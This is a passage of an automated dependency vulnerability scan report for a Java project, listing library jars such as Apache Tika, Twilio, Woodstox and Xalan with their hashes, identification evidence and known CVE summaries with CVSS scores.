CVE-2022-33879 suppress
The initial fixes in CVE-2022-30126 and CVE-2022-30973 for regexes in the StandardsExtractingContentHandler were insufficient, and we found a separate, new regex DoS in a different regex in the StandardsExtractingContentHandler. These are now fixed in 1.28.4 and 2.4.1. NVD-CWE-Other
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: LOW (3.3) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L References:
Vulnerable Software & Versions: (show all )
tika-parsers-1.22.jarDescription:
Apache Tika is a toolkit for detecting and extracting metadata and structured text content from various documents using existing parser libraries. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/tika/tika-parsers/1.22/tika-parsers-1.22.jar
MD5: 688b25cce3d2ba79d4172309ef5a4e58
SHA1: b8a823128f6165882ae41de3ded8655609d62d88
SHA256: 756e77987077cc485763beeac77925001b9b4993e58978be09b8e6c510770aea
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name tika-parsers High Vendor jar package name apache Highest Vendor jar package name tika Highest Vendor Manifest automatic-module-name org.apache.tika.parsers Medium Vendor Manifest bundle-docurl http://tika.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.tika.parsers Medium Vendor Manifest implementation-url http://tika.apache.org/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.tika Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid tika-parsers Highest Vendor pom artifactid tika-parsers Low Vendor pom groupid org.apache.tika Highest Vendor pom name Apache Tika parsers High Vendor pom organization name The Apache Software Foundation High Vendor pom organization url http://www.apache.org Medium Vendor pom parent-artifactid tika-parent Low Vendor pom url http://tika.apache.org/ Highest Product file name tika-parsers High Product jar package name apache Highest Product jar package name parser Highest Product jar package name tika Highest Product Manifest automatic-module-name org.apache.tika.parsers Medium Product Manifest bundle-docurl http://tika.apache.org/ Low Product Manifest Bundle-Name Apache Tika parsers Medium Product Manifest bundle-symbolicname org.apache.tika.parsers Medium Product Manifest Implementation-Title Apache Tika parsers High Product Manifest implementation-url http://tika.apache.org/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache Tika parsers Medium Product pom artifactid tika-parsers Highest Product pom groupid org.apache.tika Highest Product pom name Apache Tika parsers High Product pom organization name The Apache Software Foundation Low Product pom organization url http://www.apache.org Low Product pom parent-artifactid tika-parent Medium Product pom url http://tika.apache.org/ Medium Version file version 1.22 High Version Manifest Implementation-Version 1.22 High Version pom version 1.22 Highest
CVE-2020-1950 suppress
A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser in versions 1.0-1.23. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2020-1951 suppress
A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser in versions 1.0-1.23. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2020-9489 (OSSINDEX) suppress
A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops in Tika's ICNSParser, MP3Parser, MP4Parser, SAS7BDATParser, OneNoteParser and ImageParser. Apache Tika users should upgrade to 1.24.1 or later. The vulnerabilities in the MP4Parser were partially fixed by upgrading the com.googlecode:isoparser:1.1.22 dependency to org.tallison:isoparser:1.9.41.2. For unrelated security reasons, we upgraded org.apache.cxf to 3.3.6 as part of the 1.24.1 release.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2020-9489 for details CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2:
Base Score: MEDIUM (5.5) Vector: /AV:L/AC:L/Au:/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.apache.tika:tika-parsers:1.22:*:*:*:*:*:*:* CVE-2021-28657 suppress
A carefully crafted or corrupt file may trigger an infinite loop in Tika's MP3Parser up to and including Tika 1.25. Apache Tika users should upgrade to 1.26 or later. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-25169 suppress
The BPG parser in versions of Apache Tika before 1.28.2 and 2.4.0 may allocate an unreasonable amount of memory on carefully crafted files. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-30126 suppress
In Apache Tika, a regular expression in our StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.2 and 2.4.0 NVD-CWE-Other
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-30973 suppress
We failed to apply the fix for CVE-2022-30126 to the 1.x branch in the 1.28.2 release. In Apache Tika, a regular expression in the StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.3. NVD-CWE-Other
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-33879 suppress
The initial fixes in CVE-2022-30126 and CVE-2022-30973 for regexes in the StandardsExtractingContentHandler were insufficient, and we found a separate, new regex DoS in a different regex in the StandardsExtractingContentHandler. These are now fixed in 1.28.4 and 2.4.1. NVD-CWE-Other
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: LOW (3.3) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L References:
Vulnerable Software & Versions: (show all )
twilio-7.42.0.jarDescription:
Twilio Java Helper Library License:
MIT License: http://www.opensource.org/licenses/mit-license.php File Path: /var/simplicite/.m2/repository/com/twilio/sdk/twilio/7.42.0/twilio-7.42.0.jar
MD5: 5827cc6fb38a4948b41f197bc11d71d9
SHA1: 90428a9e9fc22c3fbe6cb8e5a1d5075df1420607
SHA256: 76add2813e7ebb4a60e11acca594dd2f7e3cb1b076c354456f46a0b0f511bfaf
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name twilio High Vendor jar package name rest Low Vendor jar package name twilio Highest Vendor jar package name twilio Low Vendor pom artifactid twilio Highest Vendor pom artifactid twilio Low Vendor pom developer email api@twilio.com Low Vendor pom developer id api Medium Vendor pom developer name Twilio API Medium Vendor pom developer org Twilio, Inc. Medium Vendor pom developer org URL https://www.twilio.com Medium Vendor pom groupid com.twilio.sdk Highest Vendor pom name twilio High Vendor pom url https://www.twilio.com Highest Product file name twilio High Product jar package name rest Low Product jar package name twilio Highest Product pom artifactid twilio Highest Product pom developer email api@twilio.com Low Product pom developer id api Low Product pom developer name Twilio API Low Product pom developer org Twilio, Inc. Low Product pom developer org URL https://www.twilio.com Low Product pom groupid com.twilio.sdk Highest Product pom name twilio High Product pom url https://www.twilio.com Medium Version file version 7.42.0 High Version pom version 7.42.0 Highest
txw2-2.3.2.jarDescription:
TXW is a library that allows you to write XML documents.
File Path: /var/simplicite/.m2/repository/org/glassfish/jaxb/txw2/2.3.2/txw2-2.3.2.jarMD5: 3f278f148c5d27dc608c25cb7d093b94SHA1: ce5be7da2e442c25ec14c766cb60cb802741727bSHA256: 4a6a9f483388d461b81aa9a28c685b8b74c0597993bf1884b04eddbca95f48feReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name txw2 High Vendor jar package name sun Highest Vendor jar package name txw Highest Vendor jar package name txw2 Highest Vendor jar package name xml Highest Vendor jar (hint) package name oracle Highest Vendor Manifest git-revision ae93d95 Low Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.oracle Medium Vendor Manifest (hint) Implementation-Vendor sun High Vendor pom artifactid txw2 Highest Vendor pom artifactid txw2 Low Vendor pom groupid org.glassfish.jaxb Highest Vendor pom name TXW2 Runtime High Vendor pom parent-artifactid jaxb-txw-parent Low Vendor pom parent-groupid com.sun.xml.bind.mvn Medium Product file name txw2 High Product jar package name sun Highest Product jar package name txw Highest Product jar package name txw2 Highest Product jar package name xml Highest Product Manifest git-revision ae93d95 Low Product Manifest Implementation-Title TXW Runtime High Product Manifest specification-title Java Architecture for XML Binding Medium Product pom artifactid txw2 Highest Product pom groupid org.glassfish.jaxb Highest Product pom name TXW2 Runtime High Product pom parent-artifactid jaxb-txw-parent Medium Product pom parent-groupid com.sun.xml.bind.mvn Medium Version file version 2.3.2 High Version Manifest build-id 2.3.2 Medium Version Manifest Implementation-Version 2.3.2 High Version Manifest major-version 2.3.2 Medium Version pom version 2.3.2 Highest
udunits-4.5.5.jarDescription:
The ucar.units Java package is for decoding and encoding
formatted unit specifications (e.g. "m/s"), converting numeric values
between compatible units (e.g. between "m/s" and "knot"), and for
performing arithmetic operations on units (e.g. dividing one unit by
another, raising a unit to a power). File Path: /var/simplicite/.m2/repository/edu/ucar/udunits/4.5.5/udunits-4.5.5.jarMD5: 025ffadf77de73601443c8262c995df0SHA1: d8c8d65ade13666eedcf764889c69321c247f153SHA256: fb641ad901d1526d53f2b13bc86baec703c57d58e6001cfa54ca7734c97fb30dReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name udunits High Vendor jar package name ucar Highest Vendor jar package name units Highest Vendor Manifest built-on 20150306.1537 Low Vendor Manifest Implementation-Vendor UCAR/Unidata High Vendor Manifest Implementation-Vendor-Id edu.ucar Medium Vendor pom artifactid udunits Highest Vendor pom artifactid udunits Low Vendor pom developer id emmerson Medium Vendor pom developer name Steve Emmerson Medium Vendor pom groupid edu.ucar Highest Vendor pom name udunits High Vendor pom parent-artifactid thredds-parent Low Vendor pom url http://www.unidata.ucar.edu/software/udunits// Highest Product file name udunits High Product jar package name ucar Highest Product jar package name units Highest Product Manifest built-on 20150306.1537 Low Product Manifest Implementation-Title udunits High Product pom artifactid udunits Highest Product pom developer id emmerson Low Product pom developer name Steve Emmerson Low Product pom groupid edu.ucar Highest Product pom name udunits High Product pom parent-artifactid thredds-parent Medium Product pom url http://www.unidata.ucar.edu/software/udunits// Medium Version file version 4.5.5 High Version Manifest Implementation-Version 4.5.5 High Version pom version 4.5.5 Highest
unit-api-1.0.jarDescription:
Units of Measurement Standard - This JSR specifies Java packages for modeling and working with measurement values, quantities and their corresponding units. License:
BSD: LICENSE.txt File Path: /var/simplicite/.m2/repository/javax/measure/unit-api/1.0/unit-api-1.0.jar
MD5: 0e62b80ee212b7bb9d3cd150ff988a93
SHA1: 6b960260278588d7ff02fe376e5aad39a9c7440b
SHA256: 35da65fdbd3f9c1fe79cfc8399db975fd97660d8a219febfda9fd1a5fc058f10
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name unit-api High Vendor jar package name javax Highest Vendor jar package name measure Highest Vendor jar package name unit Highest Vendor Manifest bundle-docurl http://unitsofmeasurement.github.io Low Vendor Manifest bundle-symbolicname javax.measure.unit-api Medium Vendor Manifest implementation-url http://unitsofmeasurement.github.io Low Vendor Manifest Implementation-Vendor Unit-API contributors High Vendor Manifest Implementation-Vendor-Id javax.measure Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Jean-Marie Dautelle, Werner Keil, V2COM Low Vendor pom artifactid unit-api Highest Vendor pom artifactid unit-api Low Vendor pom developer email christopher.senior@gmail.com Low Vendor pom developer email eralmas7@yahoo.com Low Vendor pom developer email jean-marie@dautelle.com Low Vendor pom developer email karen.legrand@iem.com Low Vendor pom developer email llima@v2com.mobi Low Vendor pom developer email martin.desruisseaux@geomatys.com Low Vendor pom developer email mohamed.taman@gmail.com Low Vendor pom developer email otaviopolianasantana@gmail.com Low Vendor pom developer email rajmahendra@gmail.com Low Vendor pom developer email werner@uom.technology Low Vendor pom developer id dautelle Medium Vendor pom developer id desruisseaux Medium Vendor pom developer id duckasteroid Medium Vendor pom developer id eralmas7 Medium Vendor pom developer id karen_legrand Medium Vendor pom developer id leomrlima Medium Vendor pom developer id mohamed-taman Medium Vendor pom developer id otaviojava Medium Vendor pom developer id rajmahendra Medium Vendor pom developer id werner.keil Medium Vendor pom developer name Almas Shaikh Medium Vendor pom developer name Chris Senior Medium Vendor pom developer name Jean-Marie Dautelle Medium Vendor pom developer name Karen Legrand Medium Vendor pom developer name Leonardo de Moura Rocha Lima Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer name Mohamed Mahmoud Taman Medium Vendor pom developer name Otávio Gonçalves de Santana Medium Vendor pom developer name Rajmahendra Hegde Medium Vendor pom developer name Werner Keil Medium Vendor pom developer org Airbus Medium Vendor pom developer org Creative Arts & Technologies Medium Vendor pom developer org Geomatys Medium Vendor pom developer org Individual / JP Morgan Medium Vendor pom developer org Individual / Morocco JUG Medium Vendor pom developer org Individual / SouJava Medium Vendor pom developer org Innovation Emergency Management (IEM) Medium Vendor pom developer org JUG Chennai Medium Vendor pom developer org Snap-on Inc. Medium Vendor pom developer org V2COM Medium Vendor pom developer org URL http://www.airbus.com Medium Vendor pom developer org URL http://www.catmedia.us Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom developer org URL http://www.iem.com Medium Vendor pom developer org URL http://www.v2com.mobi/ Medium Vendor pom groupid javax.measure Highest Vendor pom name Units of Measurement API High Vendor pom organization name Jean-Marie Dautelle, Werner Keil, V2COM High Vendor pom organization url http://unitsofmeasurement.github.io Medium Vendor pom url http://unitsofmeasurement.github.io/ Highest Product file name unit-api High Product jar package name javax Highest Product jar package name measure Highest Product jar package name unit Highest Product Manifest bundle-docurl http://unitsofmeasurement.github.io Low Product Manifest Bundle-Name Units of Measurement API Medium Product Manifest bundle-symbolicname javax.measure.unit-api Medium Product Manifest Implementation-Title Units of Measurement API High Product Manifest implementation-url http://unitsofmeasurement.github.io Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Units of Measurement API Medium Product pom artifactid unit-api Highest Product pom developer email christopher.senior@gmail.com Low Product pom developer email eralmas7@yahoo.com Low Product pom developer email jean-marie@dautelle.com Low Product pom developer email karen.legrand@iem.com Low Product pom developer email llima@v2com.mobi Low Product pom developer email martin.desruisseaux@geomatys.com Low Product pom developer email mohamed.taman@gmail.com Low Product pom developer email otaviopolianasantana@gmail.com Low Product pom developer email rajmahendra@gmail.com Low Product pom developer email werner@uom.technology Low Product pom developer id dautelle Low Product pom developer id desruisseaux Low Product pom developer id duckasteroid Low Product pom developer id eralmas7 Low Product pom developer id karen_legrand Low Product pom developer id leomrlima Low Product pom developer id mohamed-taman Low Product pom developer id otaviojava Low Product pom developer id rajmahendra Low Product pom developer id werner.keil Low Product pom developer name Almas Shaikh Low Product pom developer name Chris Senior Low Product pom developer name Jean-Marie Dautelle Low Product pom developer name Karen Legrand Low Product pom developer name Leonardo de Moura Rocha Lima Low Product pom developer name Martin Desruisseaux Low Product pom developer name Mohamed Mahmoud Taman Low Product pom developer name Otávio Gonçalves de Santana Low Product pom developer name Rajmahendra Hegde Low Product pom developer name Werner Keil Low Product pom developer org Airbus Low Product pom developer org Creative Arts & Technologies Low Product pom developer org Geomatys Low Product pom developer org Individual / JP Morgan Low Product pom developer org Individual / Morocco JUG Low Product pom developer org Individual / SouJava Low Product pom developer org Innovation Emergency Management (IEM) Low Product pom developer org JUG Chennai Low Product pom developer org Snap-on Inc. Low Product pom developer org V2COM Low Product pom developer org URL http://www.airbus.com Low Product pom developer org URL http://www.catmedia.us Low Product pom developer org URL http://www.geomatys.com Low Product pom developer org URL http://www.iem.com Low Product pom developer org URL http://www.v2com.mobi/ Low Product pom groupid javax.measure Highest Product pom name Units of Measurement API High Product pom organization name Jean-Marie Dautelle, Werner Keil, V2COM Low Product pom organization url http://unitsofmeasurement.github.io Low Product pom url http://unitsofmeasurement.github.io/ Medium Version file version 1.0 High Version Manifest Implementation-Version 1.0 High Version pom version 1.0 Highest
vorbis-java-core-0.8.jarFile Path: /var/simplicite/.m2/repository/org/gagravarr/vorbis-java-core/0.8/vorbis-java-core-0.8.jarMD5: 71b623b57f56daf112bddb3337ee896dSHA1: 7e9937c2575cda2e3fc116415117c74f23e43fa6SHA256: 879bb0c8923fea686609e207fd9050ab246e001868341c725929405e755cf68eReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name vorbis-java-core High Vendor jar package name gagravarr Highest Vendor jar package name gagravarr Low Vendor jar package name ogg Highest Vendor jar package name vorbis Highest Vendor pom artifactid vorbis-java-core Highest Vendor pom artifactid vorbis-java-core Low Vendor pom groupid org.gagravarr Highest Vendor pom name Ogg and Vorbis for Java, Core High Vendor pom parent-artifactid vorbis-java-parent Low Vendor pom url Gagravarr/VorbisJava Highest Product file name vorbis-java-core High Product jar package name gagravarr Highest Product jar package name ogg Highest Product jar package name vorbis Highest Product pom artifactid vorbis-java-core Highest Product pom groupid org.gagravarr Highest Product pom name Ogg and Vorbis for Java, Core High Product pom parent-artifactid vorbis-java-parent Medium Product pom url Gagravarr/VorbisJava High Version file version 0.8 High Version pom version 0.8 Highest
vorbis-java-tika-0.8.jarFile Path: /var/simplicite/.m2/repository/org/gagravarr/vorbis-java-tika/0.8/vorbis-java-tika-0.8.jarMD5: 85c7b34d5f94e66bf0c79f5d673db750SHA1: 4ddbb27ac5884a0f0398a63d46a89d3bc87dc457SHA256: a1b62281a99aec10dc69db1d2f8250952dca5841eedf1167b6b6f9585e2d0d26Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name vorbis-java-tika High Vendor jar package name gagravarr Highest Vendor jar package name gagravarr Low Vendor jar package name tika Highest Vendor jar package name tika Low Vendor pom artifactid vorbis-java-tika Highest Vendor pom artifactid vorbis-java-tika Low Vendor pom groupid org.gagravarr Highest Vendor pom name Apache Tika plugin for Ogg, Vorbis and FLAC High Vendor pom parent-artifactid vorbis-java-parent Low Vendor pom url Gagravarr/VorbisJava Highest Product file name vorbis-java-tika High Product jar package name gagravarr Highest Product jar package name tika Highest Product jar package name tika Low Product pom artifactid vorbis-java-tika Highest Product pom groupid org.gagravarr Highest Product pom name Apache Tika plugin for Ogg, Vorbis and FLAC High Product pom parent-artifactid vorbis-java-parent Medium Product pom url Gagravarr/VorbisJava High Version file version 0.8 High Version pom version 0.8 Highest
wmf2svg-0.9.8.jarDescription:
WMF to SVG Converting Tool & Library License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/net/arnx/wmf2svg/0.9.8/wmf2svg-0.9.8.jar
MD5: 34b920f0aa840b1792702d253c2c58b7
SHA1: 365614a3ee72ec475d9032f906d37b753fbe2bfa
SHA256: c7f136558140c3fbe9410199ca509895faad4fa79bdc185e72a868f1c2819b4a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name wmf2svg High Vendor jar package name arnx Highest Vendor jar package name arnx Low Vendor jar package name net Highest Vendor jar package name net Low Vendor jar package name wmf2svg Highest Vendor jar package name wmf2svg Low Vendor pom artifactid wmf2svg Highest Vendor pom artifactid wmf2svg Low Vendor pom developer email hidekatsu.izuno@gmail.com Low Vendor pom developer id hidekatsu.izuno Medium Vendor pom developer name Hidekatsu Izuno Medium Vendor pom groupid net.arnx Highest Vendor pom name wmf2svg High Vendor pom url http://wmf2svg.sourceforge.jp/ Highest Product file name wmf2svg High Product jar package name arnx Highest Product jar package name arnx Low Product jar package name gdi Low Product jar package name net Highest Product jar package name wmf2svg Highest Product jar package name wmf2svg Low Product pom artifactid wmf2svg Highest Product pom developer email hidekatsu.izuno@gmail.com Low Product pom developer id hidekatsu.izuno Low Product pom developer name Hidekatsu Izuno Low Product pom groupid net.arnx Highest Product pom name wmf2svg High Product pom url http://wmf2svg.sourceforge.jp/ Medium Version file version 0.9.8 High Version pom version 0.9.8 Highest
woodstox-core-6.2.0.jar (shaded: com.sun.xml.bind.jaxb:isorelax:20090621)Description:
Unknown version of isorelax library used in JAXB project File Path: /var/simplicite/.m2/repository/com/fasterxml/woodstox/woodstox-core/6.2.0/woodstox-core-6.2.0.jar/META-INF/maven/com.sun.xml.bind.jaxb/isorelax/pom.xmlMD5: 6fbb4bc95fbf2072bc6e3b790553fe81SHA1: 314ec72948d5c1fc71d553cbbd7a130caa6f9f13SHA256: cda6451d0231a973352b592ff950e39224ba6ba1a2f35eeab66511b5c225dff1Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid isorelax Low Vendor pom groupid com.sun.xml.bind.jaxb Highest Vendor pom name JAXB isorelax library High Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Product pom artifactid isorelax Highest Product pom groupid com.sun.xml.bind.jaxb Highest Product pom name JAXB isorelax library High Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Version pom parent-version 20090621 Low Version pom version 20090621 Highest
CVE-2023-34411 suppress
The xml-rs crate before 0.8.14 for Rust and Crab allows a denial of service (panic) via an invalid <! token (such as <!DOCTYPEs/%<!A nesting) in an XML document. The earliest affected version is 0.8.9. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
woodstox-core-6.2.0.jar (shaded: net.java.dev.msv:xsdlib:2013.6.1)Description:
XML Schema datatypes library File Path: /var/simplicite/.m2/repository/com/fasterxml/woodstox/woodstox-core/6.2.0/woodstox-core-6.2.0.jar/META-INF/maven/net.java.dev.msv/xsdlib/pom.xmlMD5: aaf872ed9d1aabee25e03c2a132ffd8eSHA1: 47f218a999411ed028f089d59ebef8f14e0fe914SHA256: d6e83c124436049d83238fc532a26c5d8ccd7e4ab10eba6d96043c850ac82f3cReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid xsdlib Low Vendor pom groupid net.java.dev.msv Highest Vendor pom name MSV XML Schema Library High Vendor pom parent-artifactid msv Low Product pom artifactid xsdlib Highest Product pom groupid net.java.dev.msv Highest Product pom name MSV XML Schema Library High Product pom parent-artifactid msv Medium Version pom version 2013.6.1 Highest
woodstox-core-6.2.0.jarDescription:
Woodstox is a high-performance XML processor that implements Stax (JSR-173),
SAX2 and Stax2 APIs
License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/woodstox/woodstox-core/6.2.0/woodstox-core-6.2.0.jar
MD5: 0a45f2441d81fb2c01781f11ee1e3fd3
SHA1: bfe9e1c4436230011e6aadced5df9262ec821cda
SHA256: 078f8f918344f2c195917339060dedfb758cec1e014f96c6082fe0bdb6037af5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name woodstox-core High Vendor jar package name stax Highest Vendor Manifest bundle-docurl https://github.com/FasterXML/woodstox Low Vendor Manifest bundle-symbolicname com.fasterxml.woodstox.woodstox-core Medium Vendor Manifest implementation-build-date 2020-04-25 20:08:23+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.woodstox Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid woodstox-core Highest Vendor pom artifactid woodstox-core Low Vendor pom developer email tatu@fasterxml.com Low Vendor pom developer id cowtowncoder Medium Vendor pom developer name Tatu Saloranta Medium Vendor pom groupid com.fasterxml.woodstox Highest Vendor pom name Woodstox High Vendor pom organization name FasterXML High Vendor pom organization url http://fasterxml.com Medium Vendor pom parent-artifactid oss-parent Low Vendor pom parent-groupid com.fasterxml Medium Vendor pom url FasterXML/woodstox Highest Product file name woodstox-core High Product jar package name osgi Highest Product jar package name stax Highest Product Manifest bundle-docurl https://github.com/FasterXML/woodstox Low Product Manifest Bundle-Name Woodstox Medium Product Manifest bundle-symbolicname com.fasterxml.woodstox.woodstox-core Medium Product Manifest implementation-build-date 2020-04-25 20:08:23+0000 Low Product Manifest Implementation-Title Woodstox High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Woodstox Medium Product pom artifactid woodstox-core Highest Product pom developer email tatu@fasterxml.com Low Product pom developer id cowtowncoder Low Product pom developer name Tatu Saloranta Low Product pom groupid com.fasterxml.woodstox Highest Product pom name Woodstox High Product pom organization name FasterXML Low Product pom organization url http://fasterxml.com Low Product pom parent-artifactid oss-parent Medium Product pom parent-groupid com.fasterxml Medium Product pom url FasterXML/woodstox High Version file version 6.2.0 High Version Manifest Bundle-Version 6.2.0 High Version Manifest Implementation-Version 6.2.0 High Version pom parent-version 6.2.0 Low Version pom version 6.2.0 Highest
CVE-2022-40152 suppress
Those using Woodstox to parse XML data may be vulnerable to Denial of Service attacks (DOS) if DTD support is enabled. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
xalan-2.7.2.jarDescription:
Xalan-Java is an XSLT processor for transforming XML documents into HTML,
text, or other XML document types. It implements XSL Transformations (XSLT)
Version 1.0 and XML Path Language (XPath) Version 1.0 and can be used from
the command line, in an applet or a servlet, or as a module in other program.
File Path: /var/simplicite/.m2/repository/xalan/xalan/2.7.2/xalan-2.7.2.jarMD5: 6aa6607802502c8016b676f25f8e4873SHA1: d55d3f02a56ec4c25695fe67e1334ff8c2ecea23SHA256: a44bd80e82cb0f4cfac0dac8575746223802514e3cec9dc75235bc0de646af14Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xalan High Vendor jar package name and Highest Vendor jar package name apache Highest Vendor jar package name processor Highest Vendor jar package name version Highest Vendor jar package name xalan Highest Vendor jar package name xml Highest Vendor jar package name xpath Highest Vendor jar package name xslt Highest Vendor manifest: java_cup/runtime/ Implementation-Vendor Princeton University Medium Vendor manifest: org/apache/bcel/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/apache/regexp/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/apache/xalan/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/apache/xalan/xsltc/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/apache/xml/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/apache/xpath/ Implementation-Vendor Apache Software Foundation Medium Vendor pom artifactid xalan Highest Vendor pom artifactid xalan Low Vendor pom groupid xalan Highest Vendor pom name Xalan Java High Vendor pom parent-artifactid apache Low Vendor pom parent-groupid org.apache Medium Vendor pom url http://xml.apache.org/xalan-j/ Highest Product file name xalan High Product jar package name and Highest Product jar package name apache Highest Product jar package name bcel Highest Product jar package name code Highest Product jar package name expression Highest Product jar package name processor Highest Product jar package name regexp Highest Product jar package name runtime Highest Product jar package name version Highest Product jar package name xalan Highest Product jar package name xml Highest Product jar package name xpath Highest Product jar package name xslt Highest Product jar package name xsltc Highest Product manifest: java_cup/runtime/ Implementation-Title runtime Medium Product manifest: java_cup/runtime/ Specification-Title Runtime component of JCup Medium Product manifest: org/apache/bcel/ Implementation-Title org.apache.bcel Medium Product manifest: org/apache/bcel/ Specification-Title Byte Code Engineering Library Medium Product manifest: org/apache/regexp/ Implementation-Title org.apache.regexp Medium Product manifest: org/apache/regexp/ Specification-Title Java Regular Expression package Medium Product manifest: org/apache/xalan/ Implementation-Title org.apache.xalan Medium Product manifest: 